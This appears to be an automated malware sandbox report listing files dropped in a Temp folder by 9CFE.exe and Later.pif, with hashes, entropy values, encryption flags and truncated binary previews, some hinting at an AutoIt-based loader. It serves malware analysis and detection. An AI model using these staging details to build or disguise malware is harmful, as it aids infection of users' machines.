Preview:	.W.\...Eloocdd..X..PH....$.f'.k.c.\|~...02..P....z.E/...../.....b{{........f..R...t:?....sss..7n..,,4......^...J..Rye.@.....<g..4m.......wvvb.\n.T.r8..gffFK.....`..011!&...f<.TS.N.......zz@DJ..i.0.>.=.o..^y.r..T.T.x.WS0....b..p...............r..tJ3...}].~.L...........)...$......666l....&..\.w.V.].X,..Db.^.#.J..j!..cll.n.[\.+.!..1..r....u.?..;...Ni..;..7..m..y...R.`zz.###H.R'.ry.n...B......+++.k.5........_......AT...[.\.@p.........rS.ju. .......EY..T.X.....z...l"..9.R.C......e.x^.h\........h ..aoo.V......x<...>j6...v.z(....I/--.....}...]i.....k...k...P.. ..9 x..oggg,...k.Z...[.`p:..y......`6.1>>......nq...(.e3......\{......n.B:n..I.XD:.F.P@$.A4....y+..y...t:.B.......7n.Jf\|5.^/..Z. .......>G.J....u....H:.....f....x..x<(T...rb7.`0(61....e.v.....j..F.......j.\.#.. ....p`bb.^.............v....p..+.......BK...M\|..^5.......1....90..........C.T*vzz.k6.3...j0....B.f..l6.b....H$"...Jj...=aE.oR.W;G.$.A........d.P84......6...h.~...F...f......f..x<..

C:\Users\user\AppData\Local\Temp\Closing

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	78848
Entropy (8bit):	7.997565494161811
Encrypted:	true
SSDEEP:	1536:beu6/A3dwW6ekkGLpLmhzue+o26yAEYumZw5fvf0e26iRNuYSu:bx6IN5gqhSe+UyhYyf0e266MYF
MD5:	788BB559246270A813B5B08B0CA7FACD
SHA1:	60FFB0FE7FF2D196E77AD84210AECDDC667BD0E6
SHA-256:	78C7C598711B5DCA11D33DCB9FBC4330967780E76EADE6BDBE6FDDDD0E5B4383
SHA-512:	BBE2DB2A25360A393B8D9620025CB27FCBCBC5ED490AB8D80C7ADAB31F54A6FABD786089F40371DB4B3B7A12070120C6D175B20D7C275728FA5D2F0C02559A33
Malicious:	false
Preview:	.L.....=6.{....i..om..+[...X..P...........Z.G2...w.%.}V\|..0n=E.?.F.'.y..e...@{..%_O.p.n;\|{..........1..IB.\|fp.d.....z.....uUDRc...[..j...g..b.R.`.2}8r..,M.h......c...x../....3.....#.(....n"t..j.Y1..{..Z}s.#......>........i...G....v.E\|.He3..;...W..I9.p.93...~O.......`.1@....d.u..NbJ.c.sJ.(S9...F........1X..j..J...\...#9.Yb?.......V..H.y0R..!..n..<..X..(8r...g;....G.CB...T..M\|.qh.`..e.as.@rc...^........$.N.`.N'..&kB.o.......x...d..>J...s8...W...!...7.eZ.......\.&......N..]..]1......;6Au%.....B.c.L3p.w................./(.l..B4.H.~.'P.\<.pI'..+..W%,......n....K.I.J`..=!.pKl.OVx..O.o.F.K.t......KW8D..5..o.:..VK}.....'.o.o`./%h.s... }z.v.k{....n..>'a.X?.."..aO+.%z.......T...loL"k.. ...A%....J..I.b2..yDO0..x..;\|.X@..R..TZ.a~.......P....O...i:..8iH>j.$@..gE+...T\|..M/..41>....x`R..; .....+1...Aw.,.J..$f.`E].......[...v..?&.0-....7:.KV..s....ex..o..'..J...eJ....8,...Y%....,e..6x,.)Z..a..!.>.(...F.#...+u.3.....T...g..Gxen..U...........6..j.fG

C:\Users\user\AppData\Local\Temp\Commitments

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	4.421304726767445
Encrypted:	false
SSDEEP:	192:lZ3vRzfZyyyVNt20M4KdULSx6/JZ9FrKUS1IPuoqRWsHnhAb7K7zipamOEoh8uIo:7pzhQVNt2bSSk/ju9oiPqYaPuz
MD5:	C8B983ADBB460963126F5A21D08F6FBA
SHA1:	7D2B6CB16C6D3C7CDECD7FD330B1E03D3EFE17DF
SHA-256:	1567E6C24C7944C757E595C59F096868F14755900312B0C78EE14D7EB4EA0062
SHA-512:	C7164A8E0C3FF4A4FEED68918F9FC84593A1E1597F7A580D1FACE3C40345E5F19DA589419B7F7696BB05E37D2B6D200C21CC74A17C2326B75A668A671CB4FD6A
Malicious:	false
Preview:	.L...G...@.L.......D.L.......H.L.......L.L.......P.L....T.L.L.I...`.L...G...d.L.......h.L.......l.L.......p.L.......t.L....x.L.l.I.....L...G.....L.........L.........L.........L.........L......L...I.....L...G.....L.........L.........L.........L.........L......L...I.....L.B.G.....L.........L.........L.........L.........L......L...I.....L...@.....L.........L.........L.........L.........L......L...I.....L.,.G.....L.........L....... .L.......$.L.......(.L....,.L.$.I...8.L...G...<.L.......@.L.......D.L.......H.L.......L.L....P.L.D.I...\.L.,.G...`.L.......d.L.......h.L.......l.L.......p.L....t.L.h.I.....L.2.G.....L.........L.........L.........L.........L......L...I.....L...G.....L.........L.........L.........L.........L......L...I.....L...G.....L.........L.........L.........L.........L......L...I.....L.H.G.....L.........L.........L.........L.........L......L...I.....L...G.....L.........L.........L....... .L.......$.L....(.L...I...4.L...G...8.L.......<.L.......@.L.......D.L.......H.L....L.L...

C:\Users\user\AppData\Local\Temp\Cover

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.2143736203359765
Encrypted:	false
SSDEEP:	192:wGyYqbQWww9nikP/767EnkEHay0pjW6+fWBsjuo:fnqccokn7IEV0pQfsKuo
MD5:	3141771EB239CA6BB2A43705FD855FC0
SHA1:	5ACCBC2B445BD247D5A748BDACD1BE7A25AAF1E2
SHA-256:	C8E354A697A15B7BC64FE00AD47411603EC2CC10DC7CB334033744973040C9E5
SHA-512:	C058CC99A601CF42085BE47272CEB61CC5EB2E9510985473BA8C6F6BBA9819577EA08AADEE71150BC3A75409DA7B9BDC7BA9FDBC920FF8E5B855ABD31FAF7A62
Malicious:	false
Preview:	..L......L..2I.....L.jEH.....L.........L....... .L.......$.L.......(.L....,.L..1I...8.L.SFH...<.L.......@.L.......D.L.......H.L.......L.L....P.L.(0I...\.L..FH...`.L.......d.L.......h.L.......l.L.......p.L....t.L..2I.....L.XGH.....L.........L.........L.........L.........L......L...I.....L..GH.....L.........L.........L.........L.........L......L..5I.....L.".@.....L.........L.........L.........L.........L......L..5I.....L..3G.....L.........L.........L.........L.........L......L..4I.....L..F.....L.........L.........L....... .L.......$.L....(.L.03I...4.L.@.F...8.L.......<.L.......@.L.......D.L.......H.L....L.L..2I...X.L.z.F...\.L.......`.L.......d.L.......h.L.......l.L....p.L.l4I...\|.L...F.....L.........L.........L.........L.........L......L..3I.....L...F.....L.........L.........L.........L.........L......L.L4I.....L...G.....L.........L.........L.........L.C.......L......L..0I.....L...G.....L.........L.........L.........L.B.......L......L.h/I.....L...G.....L.........L.........L.........L..

C:\Users\user\AppData\Local\Temp\Daily

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	76800
Entropy (8bit):	7.997428505326654
Encrypted:	true
SSDEEP:	1536:baRZiTBERWndm17bTZGTe6Od/EJ/NxZ5Q8yv4ITH:G6aRCdmJbsC688DfyvBTH
MD5:	96958090B3358858DAF1400F4D26A89B
SHA1:	F0C3D4F0EFF1B8001E0E8D5B5BAFD7266CEE3669
SHA-256:	EC731EAA8FC2CF0121F7E5A31373A71B860FB3D292101349A78B7429EDD15DB8
SHA-512:	496282E36CA7D5D8B10CC13501F66167E4D3B03FEEDFE027C6C6A33F4DECC5EAAC931589EDA7A60C6BE3067EDE478D023FDE757C48CEF94BF354471309FE0102
Malicious:	false
Preview:	IGq....6Z-...........D.....K-..j~...R....}..z..$.}]...\...Q.L.6b.=.....Yt..7....G...o........MP..{..."..#.v....?.q..4.......A&..i.A....d...y..-9'#._....BH.37U.3...BY.V?_..W.......q..)6._..W.F.\|...Mldf..}..).i..0.^7=.2.....k.......J...,..w..cB....`R.)<z.Z..az.H..A...~5....r....Z._.9.B.e.c../.v....}.0]/.aS.]....P.'...1.A....vCW...zX...........'eX.Y..Q.U...v.~.M.......O}..v....)K9.J,T@...7.V.....A....\B.i..`..Q0R/..-=]..!.S.MO...\K.#...)}{.k'.....mF~.zT...... f1...#xg..Q-.5.....Q.......]zM.cL.w...rJH...z..9..^.... .G...D^@SO.......@.vE..N..w.....=.P.....2..;........w+d...<.]...\|.MEI...B0.rb.BFp..E.......Bf'!...z;.j..dp......4..Es$bA5.M..{g.T.....bh.]........tZ .b........JMI.....4.....X...>...K.....,.E.cc.K.KW..tX`...2..D[x.R..6...r.+...i....9.` ...q.=.BK....3...#.y.._...F..y.+..N...Q.u......-j....T.....F*.d%..._w._S...p8.;.A?.........g..l:........`J....;..m;...^.h.$...M.'9Bt3M.......y...!\...a..;X..$.R......[...i..{&.9...].XsH.U....E9

C:\Users\user\AppData\Local\Temp\Denver

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	9216
Entropy (8bit):	6.535883088376657
Encrypted:	false
SSDEEP:	192:pS6XgRZi3LdB1gPOf0WcKPVo1FNVvmQ2cPMqAnWu5ckScqrc8:pNXxdB1gv4PSTNVvmQXPMYSckSlf
MD5:	FD15A680275B95D80A71074ADD0EC220
SHA1:	62858FF7C24CB825DCF681BAEA3AD17F40DEA330
SHA-256:	DDF4D0F67C60CAB0E294FBED7F1CDE5AD07C9FA9D9695A97E5F1034E1A2BA083
SHA-512:	3B33803EFDF683B2596D4401F062D86F93878BC6B76EE10615145739845C384F0F229983BFDD318C3B90A0181688BDE576CD6B943CC2CE837B2DCB75C216E6C6
Malicious:	false
Preview:	...T...D$0.L$.P.F...............D$ ..D$..T$..L$......F..T$..T...M .D$.;.~....D$..C.9...j....}...}.tl.E..0.E .0.7.m....\$....E..7..;T$.}!..j ..._.C..4..C..t..B..;T$.\|.}..L$..C.....t...t$..........j.X..3.@...#.t$..E..0.E .0V......M....3.D$....L$0.1....L$@.(....L$P....._^..[..]...U..U.SVW.z....u?.}..'..;.~@...C.....t.....f....M.V.A..0....YY..t......U.;.\|......2....}.....;.}...x..C........C....E.......3._^[]...V..W3..N...t.Q......~..F...t...u..v..;....v..3...YY.~..~..>.~._^.U..Q.u.j..u..u..u......Y]...U.....e...E.SVWP.E..P.u..........u..}..7.G..M........\|...\...U..T...M..E....t........E.;.\|.j._.u.........&....F............!t..u..u.QPWVS.u...........E....th...uc+}...tR...tW.M...#...M..9$....;.~...SQ..#..YPV.B......SQ.M...#..YPS.M..v...P.$.......Q......t.WVW....@t&..t..M..#.....>.u.........F.............tN...t............t..M.............t..M..........u....].......E....F..........J......JtsJJt8...........t..M........V..>.^..u....}....F......^.......t..M..w......>.u....T....>..

C:\Users\user\AppData\Local\Temp\Dis

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	46080
Entropy (8bit):	5.046712164047226
Encrypted:	false
SSDEEP:	384:R7VkxhPfpluui01zrevzAHJcXj7c88888888888888888888888888888888888l:R7VkrHpluuxdCvEHKKgItUHiC
MD5:	D3FAAB109A7022713033E68BC5BEDC44
SHA1:	8B79B20D52ADE296BF73EE1852B1A0D1B363C153
SHA-256:	1DE60AB65F02EF9094718DCCC3DB5A573EF6A9D9C442C72C92CBAC9561A0852C
SHA-512:	F3F6A610ACE7340E0ED74FD4AA45656809F53E04A0D9A02213D8C8FBCCC45E905A50B95B03ED9C652F64375F03B87FADC387BDDE12CA596ADD4DCA533040B83E
Malicious:	false
Preview:	...L.L.?..n.H.N>.....`.@...H.S.?.W....$>.......@...8.Z.?...q.;>.......@.....a.?N../.[7>.......@...(.h.?..=..mC>.......@...0oo.?.H.75.M>.......@...H.v.?P.....#>..... .@....\|.?.G....7>.....@.@....*..?.#4..2I>.....`.@.......?o....oJ>.......@.......?...-..#>.......@.......?.h..%.F>.......@....@..?.R.x^.D>.......@...PP..?....s.@>.......@...4L..?P._!..#>..... .@....4..?..:#.G>.....@.@...L...?qg.:&.J>.....`.@...H..?5L$...4>.......@...\w..?.!.1..C>.......@.......?....[<>.......@...D...?..<....=.......@.......?...~...=.......@....y..?......B>..... .@.......?.~....4>.....@.@...h...?..u.\|.8>.....`.@....E..?A.8yL.;>.......@....h..?..41..C>.......@....{..?-...+oF>.......@...$...?x.....O>.......@....s..?..m.T2>.......@....W..?.....=.>..... .@....-..?..\..=>.....@.@.......?....\=.=.....`.@......?..j\&".>.......@....X..?...1.D>>.......@.......?.#O#`.I>.......@......?.}....0>.......@.......?...F\IE>.......@...t{#.?....,B>..... .@...0.'.?.E. ].$>.....@.@...,>,.?...?.5>.....`.@.....0.?..iIq.E>

C:\Users\user\AppData\Local\Temp\Doctrine

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	6.444059541467524
Encrypted:	false
SSDEEP:	192:nwV+h9s3Qz5LiMwT1zVisLaxsmkCFbzKhg1F9VgGbVUhsVoLlh11ZsUc55QxxrVs:nBjwTZwNKm7AI4xhLk5QdSJBl
MD5:	FBC0EFBDD27231BE2221FD3D28AFF7F7
SHA1:	F4679F4BF520AA08C33073BA9CBCB849BDF7FB83
SHA-256:	AE7CE67ABCBEB34933047A7435AA59B9E06320FB2DB8F3D443AE8454F34F7367
SHA-512:	357E182B7629C272A2B250E6CABA745723AB96596E2D7480B189EF6F7D56C5F170ACA37BCE9EEFD7B4A7789708D15DFCB600DB23290AEF0F5D25A6F7A9519E64
Malicious:	false
Preview:	.~.2..'V.u.W.3V.r......3.f..~^9E.t.G..?......._[]...VW..4.I.....h.I.....tmS..gL.V....y.....tY...hL...W....0.x......t?..$hL.....9.t1.V..$hL.............u.......P......Ph.....1....I.[_^.U..}..t..u...gL..x......hL......hL....u.3.....hL.......0..<.I.3.@]...U....hL.W.}...t.W..gL..<x......u.2.......hL.V....0..u...\.I.9.t.2.....j.V..gL..3u....t....E.j.h..H.....x....E.....\|....E..........E..%LhL....PhL.........l....ThL...p....XhL..6..x.I..}..LhL......t.;.t.P..gL..Jw.......u..'...^_]...U..}..t..u...gL..Yw......hL......hL....u.3..-..hL.Wj.......8W..\.I..M.j.W....\.I..M._..3.@]...U.....\|hL.VW.}..E...t=..99t..E.P.M..y....E...M..y..u..E..\|hL.P.(....DQ......wi...7.u..~..u.3..-.M...^..V.M.}..Ti...E.\|hL.P.R....M..Xi..3.@_^..]...U..}..t..u...gL..cv......hL......hL....tW..hL.V....0.~..t.9..gL.u....gL...v...H.I..f...}..t#.u..u...L.I..F...4.I.9.u...hL...gL.^]...U..}..t..u...gL...u......hL......hL....u.3..-..hL.......E..AX.E..A\.E...~..A`.E...~..Ad3.@]...U..}..t..u...gL..}u......hL....

C:\Users\user\AppData\Local\Temp\Dresses

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	63488
Entropy (8bit):	6.5578611648939145
Encrypted:	false
SSDEEP:	1536:BFsoejQ1/9klkp5VLGEDuaiC7v8xV96AE11yHxpfYAzO:BqoT1/Qkp5IKuLuv8xVTOAxpg6O
MD5:	1CEEDBD8FCD17CC6354FDD5E1F3A4805
SHA1:	B4407DEDF99A02EF1BE762240885F73C76364217
SHA-256:	044865AD2A527AB181100FECF465F37DDD792AE9C6990B55F5BA5A81CB3A9A5E
SHA-512:	4311CDAE70EF01DBA34CC1B358471A4B476749AD3196922DF7347B6A823EA23DB49F7281645982EC088FD3640DE60834943B51CBFC3335B675F3105D3DCBF9C9
Malicious:	false
Preview:	$.u...P.Q.SSSh.....P...j.Y.D$H.D$@f.L$@.M.P.......SSSh.....(....L$.SSSP....V....L$P.....D$@P..\.I._^..[..]...U......SW..M.h..I.....}..W....N.....u...j.j..H.............V3.F.u.9w.v..J........E...................G....x..u..8..3..x.....u.....3.f.8.....E...........e...M.e.........tG...M.0........E.u..t.C..M.QVj...h......`...P.u.....I..M...`...P.......j.j..H.........}....K....u.....I..=......u\|.... ......M.Qh....j.W.P..........M............U.RQ.P..u..}.E..u..P......QLj(..l...P.E.P..H.I..M...l...P......E...P.Q......e...M...QhL<I.W....x..u..M.QV...P.....V.Q..u....}..tv...M.Qh....j.W.P.....x_.M...tX.....u.3.RRR.U.R.....u(3.U.SSRSj.Q.P0.u..M..y....u.....I..]....U.R.U.RQ.PH..t$.E.P...Q...j.j..H........^_3.[..]....E......uR.U.RP.Q..M..E.P.q...A.P..A.PQ..H.I..M....u.Q...R0.........u..M......u.....I.......U.R.u.P.Q..}.........E.P...Q..e..3..E..........u.........E..U.!u.RW..P.Q..}.........E..U.RWP...Q..E.U.RP...Q..U.R..B0.E.E.P...QL.M..3.U.9U.vU.E.U.R.U.R..P.Q ..u4.E..U.R.u..

C:\Users\user\AppData\Local\Temp\Drugs

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	44032
Entropy (8bit):	7.995708398104775
Encrypted:	true
SSDEEP:	768:/+QbdXMNxrun3yHbkvJEA36VY52eoZ4mPBDk4OwZ7BHopCKN8BJ3IyyQPiARVZxL:/+QXoxa3PJEAYY5vo6mJDkzwhBmhkBPl
MD5:	BDC05936BC92D656B9C0CBE428F29C90
SHA1:	6293D7153F2F2C7C444E38F775A6B983FC57B172
SHA-256:	B4D4DED870837679BEABCDB2733B8FB83C8DB04EAD81245B688031C079FB0823
SHA-512:	9A7415651DF01D575A4A29824F69C310289ECC0774E8FEB9C2BCE9597F91991FAAD41A84D0DA90EC154486A7D90EA8F4B60EDA35AB92982024479E316273B936
Malicious:	false
Preview:	T}.rU....2T...}..........G&...`.....wy5....Z......~>.a&..[.,".7..%.3..C.W.a.....A.co.)%............{[V.N......dX..kV..r..Y.M.........D....z.....5....G...`..h..W-..........9.M_...?..c.......~.O)....Eg.6.M..D.%.hx..e.go!"@...xy5....#C....p.>..wF&...Y.).."{.l..fF..K^E&.....>...^.>B.0..(..(..T..7..s..M..".V....6.p....H.;....sO......mk....A8]...;].ek.S...N&..<..[...2.U..4]..^.b..DMR.9A8+...P.k..$.... Y;..\T-...3P[.j.-C..>w.j...Kb`....D.L..g$..i.../....5X.n...]."..c...!O.....3.........;U....c...Xv.qc410.^.]..=..+..C......L.7P.k.V.o...e..p.Z.e..:<.f.yE.<....$..zt.bO...2.G7J............@...(......>...?9m....T0._.......:...K..!}G....)kR.i......gr.+...P.S.K...8...2>.@.Q.].By_S&.c...dY....IN.b.....&./a.x..m.=P.R.0h..7e..H.......).c.j..f`\|...H.....m{31.w.o......b..>....".pTI.....e.7..f.....4b[......~. .=...ZK,v....4..I...O.,.......[I.mx..(G...S...P.NJ.J......2.8. j0:...C.5....L.W...... r......H.X,k.D.$..@f<..X...l..-.S..55...!./.K.......D.

C:\Users\user\AppData\Local\Temp\Explore

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	7.9983646851583945
Encrypted:	true
SSDEEP:	3072:pElkLuvWdB7ldNXujKvq1RA0gWW22zB1PEZhjj4vOTYQS9:pjKud1lbXujKvgb8B1S4FQ4
MD5:	747B4F0FD72C9AE3E5AEAFF2F95F6722
SHA1:	9D92B18421565A1AE1907FDDEB8C9A16D214879B
SHA-256:	F42BD539FCB9811F4F65CB82174A2352B39F9FEFF7D94A3BBF3D24DE25065B12
SHA-512:	F315D7C6B20E695236E7FF44F063649A1EC337FB08B55FEE6CF4CBDF5BA51F646F8B7A3356AC0DC9102D11CE4CC77821C936B0C840ED681F08DAEBBE460C7BE7
Malicious:	false
Preview:	..+..8\\....b....;.Rb.H....\|S4..\|....Q,..[........g....V..07.J0.LD..-.e.....'.p.....kp...X......o...(...xi...B.H..1JSd...W3.....w.M..Q...8.<..q.t7.w...hFV....Tp..D..Y.\|...s....d."..'...K..)t2.....` wt.....PKk.$^....l6?O..Pwd....U.!o..7. ..H.p.+~r.0...J@x.>..q8\...H....K:....s.3....2../#...e...~..Y..W..F.s.........!.EB...D.f..vE9[.Z...3+![.n.b?a.e..R+....i.?r.r..r.......0o#.....]./'.r..%O.....Z............Ui1...O.p6..b.I.Z......$.B..0T...?.fC...#...I...%...-....0.<..yw..b..F...0.W.{.....vE..].....;...!..E..cS.I.&.z...".....T...8..OU[.N...k=?.)...W..\.L8....[Ui5c..:.x.6...-._..^8.j...].(\.....KN.NW..I.z...6.6w....<...?<.B....^.BZ..:;!7.'E1..>.}..!k.....;G..g....^..m s..C.....u..<.......~_...G"..uA.n..n![.{A...Em.?Q.r..[W..2`..T...g......Q.lB...Y.b.?ZT.B!.f.9a+...'...fy.2v...l........ct..V.J$'.Yae.bT\L{.S.z..{t.8/yv./..n(.`p.U.T....E..f$.c..nmP.PXh._..+c..h`..q.vz....vE<.t.*..bh.B`....Wo.j.>.@.d...c.T.0.......n..K.L.......p=.$..@"...

C:\Users\user\AppData\Local\Temp\FACWLRWHGG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\78801\Later.pif
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697648179966054
Encrypted:	false
SSDEEP:	24:7/Q+t6r35NjtdGQB2dOAzD/GKwLon05avvk5byZGOQz2DfwAo+O:7oW6Xjt062d6LonB05+Vjf/o+O
MD5:	2B743B2063E25195104B0EB24000FB09
SHA1:	4BBE8DC0F1389A8C2082A1A102960A6DFA417E3D
SHA-256:	6BADB679FA8F658AD5B4BCFA108CE3CB4B16267EC34D0FDA395E0FDE077D6A35
SHA-512:	BFEA76E052B182E0FF523B5CFECBEDF46C5ED526779A92A23CFD0E0395DCD144EDA9950D01BEA17543625355701A248DB7C0873AC0998C7E30FE67ACD88BEE4D
Malicious:	false
Preview:	FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOIJCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQOWRXDIFVHURRRNGLTJZAUJLDZUVLHLMXGCRXOISIAINZBFTCEVMHTOSDRBUXYFVYIYXOYHKTGTSHIRYW

C:\Users\user\AppData\Local\Temp\Festivals

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	3.91636531375553
Encrypted:	false
SSDEEP:	384:fl1qIvtx4MjNyREfP91uphFTqU7x5MOUyM0pNDj21naB3pMygarucTQ0Snh3H:nq25NKEHq9BxyyM0Dj2Bmgari0U
MD5:	489C0B483DE5C3682D204AA4C5A56318
SHA1:	5CA0A30EDD845781E4DC960CC63F7D090886DFCA
SHA-256:	9135DAD7AB092E2CE567B9F434D16D4DFFB9A3AC63150C87481D486E7A28FC05
SHA-512:	9EF8B37FAB8A406155729079171CDEBFC7503CB933274D041BC6932940F0B77793F50C1C934F6E8B8E57CE37E4D6FAB94E509B96306A5331ACE45F88E518C28F
Malicious:	false
Preview:	c.r.i.p.t. .f.i.l.e.s. .(....a.u.3.,. ....a.3.x.)......a.u.3.;....a.3.x...A.l.l. .f.i.l.e.s. .(.....)...........a.u.3...#.i.n.c.l.u.d.e. .d.e.p.t.h. .e.x.c.e.e.d.e.d... . .M.a.k.e. .s.u.r.e. .t.h.e.r.e. .a.r.e. .n.o. .r.e.c.u.r.s.i.v.e. .i.n.c.l.u.d.e.s...E.r.r.o.r. .o.p.e.n.i.n.g. .t.h.e. .f.i.l.e.....>.>.>.A.U.T.O.I.T. .S.C.R.I.P.T.<.<.<...B.a.d. .d.i.r.e.c.t.i.v.e. .s.y.n.t.a.x. .e.r.r.o.r.....U.n.t.e.r.m.i.n.a.t.e.d. .s.t.r.i.n.g...C.a.n.n.o.t. .p.a.r.s.e. .#.i.n.c.l.u.d.e...U.n.t.e.r.m.i.n.a.t.e.d. .g.r.o.u.p. .o.f. .c.o.m.m.e.n.t.s.....O.N.....O.F.F...0.%.d...%.d.....S.h.e.l.l._.T.r.a.y.W.n.d...R.E.M.O.V.E.....K.E.Y.S.....E.X.I.S.T.S.....A.P.P.E.N.D.....b.l.a.n.k...i.n.f.o.....q.u.e.s.t.i.o.n.....s.t.o.p.....w.a.r.n.i.n.g.....L.i.n.e. .%.d.:. .....B.U.T.T.O.N.....#.3.2.7.7.0.....\.\.?.\.....\.\.?.\.U.N.C.\.....\.\...\.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.\...\.V.a.r.F.i.l.e.I.n.f.o.\.T.r.a.n.s.l.a.t.i.o.n.....0.4.0.9.0.0.0.0.....D.e.f.a.u.l.t.L.a.n.g.C.o.d.e.p.a.g.e...%.u...%.

C:\Users\user\AppData\Local\Temp\Fiber

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	6.541459614511599
Encrypted:	false
SSDEEP:	1536:mzWaIxOv/pAfkF/bIQ2dU7SP/jnsF4rJsx9RZqegm5kEMDzMdMhrNCsGJh5yAw:+WaIU/pA8F/bx2donqqnRqgmM0lAw
MD5:	783612211D75C3EA79092E5B2419267E
SHA1:	DF4A7ED25402ED9C7BCA0FBCD3CF5813FA91118B
SHA-256:	C67E6F51DF6B13C2F15C7F25E8A65B7BE6B5483B1F8455C84185DED7C0A5CE31
SHA-512:	263AB3994122D3A4F9306D64BA8E9874D8B189C15C43AB097C88AABDD7E3409A80C2D82C7D6ED895B7AEC98223B1F264DC8BAB40170030B40E69F4EF08D7EDCA
Malicious:	false
Preview:	.T$$.T$..n....L$..\....T$$.T$..X..........k..P..\.I..7.w.......k..Q.......k.........k..Q..P...k.....p.........7.<.......k..Q.p....k.........k..Q.p....~k...7....tk.....+..V.P......._k....G.C.[c@.[c@...C.[c@.<.C.\.C.x.C...C...C...C.,.C..c@..c@...C..c@...C.A.C.R.C.\|.C.\|.C.g.C.D.C.Ra@.Ra@...C.Ra@./.C.Y.C.u.C...C...C...C...C..a@..a@...C..a@...C./.C.B.C.h.C.h.C.U.C.N.C..X@..X@.*.C..X@.?.C.c.C.t.C...C...C...C.A.C..d@..d@...C..d@...C.Z.C.~.C...C...C...C. .C..X@..X@...C..X@...C.5.C.F.C.p.C.p.C.[.C...C..U@..U@...C..U@...C...C. .C.J.C.J.C.5.C...C..b@..b@...C..b@...C...C...C.9.C.9.C. .C...t..M..4...P...V_...Xz......Z...#..C......Bz.........M.....V.u...H.I......z..V............E...P.....3.@.ez..h..I.........$....z...G.P.p..,....E.....w..G....z...G....t....t....U...]......C].....V..]}......u...........9W.a....M.........1.q.V......M.......PQ.a......P.E.......P.....E.......p......E.......p..u....8..\|..........E.u...\.....\...M.....\|...E..F........~..\|........W....V..F......\|..H...wa.$

C:\Users\user\AppData\Local\Temp\Hans

Download File

Process:	C:\Users\user\AppData\Local\Temp\9CFE.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	6.771804495546552
Encrypted:	false
SSDEEP:	1536:z27MlRHq6EQU7uLQT6unj5ctpYuYtWGJG2kQyyy9Fsd:y7MlRKecTF5c2p02kQi9Fsd
MD5:	0452D038C67D5E1950354992477A9D9C
SHA1:	DD27EA03DA1EFEC8B9E7D70A6C40A9BA70A36C30
SHA-256:	3E2B2474924EBDF0D5230C3AFC8AF2ECC2BA547B157D1BAD630B3E342D51CAB0
SHA-512:	86AE0CDF66D5F7D1B91D7B4AA2C29C53D09D32CB1169DD100BA7C6CC6BC0F02A4B945B6E97CA2B5CDFB182DFEDDBAC9D4E62A61F01E919D41D457844B048D96A
Malicious:	false
